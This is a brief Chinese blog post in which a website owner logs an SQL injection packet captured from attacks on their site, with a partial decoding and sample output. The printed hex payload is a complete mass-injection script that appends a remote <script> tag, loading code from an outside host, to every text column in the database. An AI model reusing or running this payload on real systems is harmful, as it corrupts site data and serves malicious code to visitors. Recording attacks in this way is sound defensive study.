最近网站一直被骚扰,只有记录一下这些无聊哥们的手段。我也学习学习。
注射串:
221.229.160.232
/index.asp
【学点安全|抓到的一个 SQL Injection 包】';
DECLARE @S CHAR(4000);
SET @S
CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D2727776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));
EXEC(@S);
==========GET==========
解码串:
DECLARE
@T varchar(255),
@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROMTab
结果串:
spt_values name
spt_fallback_db xserver_name
spt_fallback_db name
spt_fallback_dev xserver_name
spt_fallback_dev name
spt_fallback_dev phyname
spt_fallback_usg xserver_name
spt_provider_types type_name
spt_provider_types literal_prefix
spt_provider_types literal_suffix
spt_provider_types local_type_name
spt_datatype_info_ext CREATE_PARAMS
spt_datatype_info_ext typename
MSreplication_options optname
spt_datatype_info TYPE_NAME
spt_datatype_info LITERAL_PREFIX
spt_datatype_info LITERAL_SUFFIX
spt_datatype_info CREATE_PARAMS
spt_datatype_info LOCAL_TYPE_NAME
spt_server_info attribute_name
spt_server_info attribute_value
推荐阅读
- 数据库|SQL行转列方式优化查询性能实践
- SqlServer|sql server的UPDLOCK、HOLDLOCK试验
- c/c++|有感 Visual Studio 2015 RTM 简介 - 八年后回归 Dot Net,终于迎来了 Mvc 时代,盼走了 Web 窗体时代...
- C/C++|C/C++ basis 02
- SQL|SQL基本功(五)--函数、谓词、CASE表达式
- SQL|SQL基本功(三)-- 聚合与排序
- web挖洞|HACK学习黑帽子Python--漏洞检测脚本快速编写
- sqlite|python中用SQLite3添加 主键约束 唯一约束 非空约束 外键约束(约束的介绍以及设置)
- python|python中使用SQLite3对数据库的基本操作(基于ubuntu操作系统)
- Qt实战|Qt+OpenCV联合开发(二十一)--图像翻转与旋转